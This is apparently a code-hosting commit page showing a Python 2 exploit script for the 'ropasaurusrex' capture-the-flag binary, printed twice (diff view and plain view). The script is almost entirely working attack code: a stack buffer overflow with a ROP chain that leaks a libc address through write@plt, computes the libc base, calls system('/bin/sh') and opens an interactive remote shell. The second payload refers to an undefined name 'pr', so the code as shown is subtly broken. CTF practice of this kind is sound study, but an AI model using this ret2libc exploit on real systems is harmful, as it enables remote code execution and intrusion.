hhc0null · September 7, 2015 09:47
diff --git a/ropasaurusrex_exploit.py b/ropasaurusrex_exploit.py
 #!/usr/bin/env python2

 import binascii
 import re
 import socket
 import struct
 import subprocess
 import sys
 import telnetlib
 import time


 def create_socket(rhp=('127.0.0.1', 1025)):
    s = socket.create_connection(rhp)
    f = s.makefile('rw', bufsize=0)
    return s, f

 def read_until(f, delim='\n'):
    data = ''
    while not data.endswith(delim):
        data += f.read(1)
    return data

 def interactive(s):
    t = telnetlib.Telnet()
    t.sock = s
    print "[+] got shell"
    t.interact()

 def p(x, t='<I'): 
    return struct.pack(t, x)

 def u(x, t='<I', i=0): 
    return struct.unpack(t, x)[i] if not i is None else struct.unpack(t, x)



 # constant values.
 STDOUT_FILENO = 1
 EXIT_SUCCESS = 0
 dummy_address = 0xdeadbeef

 # gadgets.
 pret = 0x80484b8 #: pop ebp ; ret  ;
 p3ret = 0x80484b6 #: pop esi ; pop edi ; pop ebp ; ret  ;
 sub_80483f4 = 0x80483f4
 got__libc_start_main = 0x8049618
 plt_write = 0x0804830c

 # depends to the environment.
 offset_libc__libc__start_main = 0x00018570
 offset_libc__libc_system = 0x0003ad70
 offset_libc__exit = 0x000b30e4
 offset_libc_bin_sh = 0x15e3a8 # objdump -sj .rodata ../../libc.so.6|grep "/bin/sh"

 # --- connect to remote(localhost?) ---
 s, f = create_socket()


 # --- leak the __libc_start_main address in libc. ---
 payload = "".join((
    p(dummy_address)*(0x88/4),      # fill up a buffer.
    p(dummy_address),               # saved ebp.
    # write(STDOUT_FILENO, got__libc_start_main, 4); // leak a raw address of __libc_start_main in libc.
    p(plt_write),                   # overwrite the return address with write@plt.
    p(p3ret),                       # collect arguments for write@plt.
    p(STDOUT_FILENO),               # 1st arg.
    p(got__libc_start_main),        # 2nd arg.
    p(4),                           # 3rd arg.
    p(sub_80483f4),                 # re-calling sub_80483f4
    ))

 f.write(payload)    # send a payload.
 time.sleep(1)       # disconnect read() stream.
 data = u(f.read(4)) # leaked the address:)


 # --- calculate the libc base address. ---
 libc_base = data - offset_libc__libc__start_main
 print "[+] libc base: 0x{:x}".format(libc_base)
 libc_system = libc_base + offset_libc__libc_system
 libc_exit = libc_base + offset_libc__exit
 libc_bin_sh = libc_base + offset_libc_bin_sh


 # --- get a shell! ---
 payload = "".join((
    p(dummy_address)*(0x88/4+2),    # fill up a buffer.
    # system("/bin/sh");
    p(libc_system),
    p(pr),                          # collect an argument for system().
    p(libc_bin_sh),                 # 1st arg
    # exit(EXIT_SUCCESS);
    p(libc_exit),
    p(dummy_address),               # exit() never return.
    p(EXIT_SUCCESS),
    ))

 f.write(payload)    # send a payload.
 time.sleep(1)       # disconnect read() stream.


 # --- enter to interactive mode. ---
 interactive(s)
	#!/usr/bin/env python2

	import binascii
	import re
	import socket
	import struct
	import subprocess
	import sys
	import telnetlib
	import time


	def create_socket(rhp=('127.0.0.1', 1025)):
	s = socket.create_connection(rhp)
	f = s.makefile('rw', bufsize=0)
	return s, f

	def read_until(f, delim='\n'):
	data = ''
	while not data.endswith(delim):
	data += f.read(1)
	return data

	def interactive(s):
	t = telnetlib.Telnet()
	t.sock = s
	print "[+] got shell"
	t.interact()

	def p(x, t='<I'):
	return struct.pack(t, x)

	def u(x, t='<I', i=0):
	return struct.unpack(t, x)[i] if not i is None else struct.unpack(t, x)



	# constant values.
	STDOUT_FILENO = 1
	EXIT_SUCCESS = 0
	dummy_address = 0xdeadbeef

	# gadgets.
	pret = 0x80484b8 #: pop ebp ; ret ;
	p3ret = 0x80484b6 #: pop esi ; pop edi ; pop ebp ; ret ;
	sub_80483f4 = 0x80483f4
	got__libc_start_main = 0x8049618
	plt_write = 0x0804830c

	# depends to the environment.
	offset_libc__libc__start_main = 0x00018570
	offset_libc__libc_system = 0x0003ad70
	offset_libc__exit = 0x000b30e4
	offset_libc_bin_sh = 0x15e3a8 # objdump -sj .rodata ../../libc.so.6\|grep "/bin/sh"

	# --- connect to remote(localhost?) ---
	s, f = create_socket()


	# --- leak the __libc_start_main address in libc. ---
	payload = "".join((
	p(dummy_address)*(0x88/4), # fill up a buffer.
	p(dummy_address), # saved ebp.
	# write(STDOUT_FILENO, got__libc_start_main, 4); // leak a raw address of __libc_start_main in libc.
	p(plt_write), # overwrite the return address with write@plt.
	p(p3ret), # collect arguments for write@plt.
	p(STDOUT_FILENO), # 1st arg.
	p(got__libc_start_main), # 2nd arg.
	p(4), # 3rd arg.
	p(sub_80483f4), # re-calling sub_80483f4
	))

	f.write(payload) # send a payload.
	time.sleep(1) # disconnect read() stream.
	data = u(f.read(4)) # leaked the address:)


	# --- calculate the libc base address. ---
	libc_base = data - offset_libc__libc__start_main
	print "[+] libc base: 0x{:x}".format(libc_base)
	libc_system = libc_base + offset_libc__libc_system
	libc_exit = libc_base + offset_libc__exit
	libc_bin_sh = libc_base + offset_libc_bin_sh


	# --- get a shell! ---
	payload = "".join((
	p(dummy_address)*(0x88/4+2), # fill up a buffer.
	# system("/bin/sh");
	p(libc_system),
	p(pr), # collect an argument for system().
	p(libc_bin_sh), # 1st arg
	# exit(EXIT_SUCCESS);
	p(libc_exit),
	p(dummy_address), # exit() never return.
	p(EXIT_SUCCESS),
	))

	f.write(payload) # send a payload.
	time.sleep(1) # disconnect read() stream.


	# --- enter to interactive mode. ---
	interactive(s)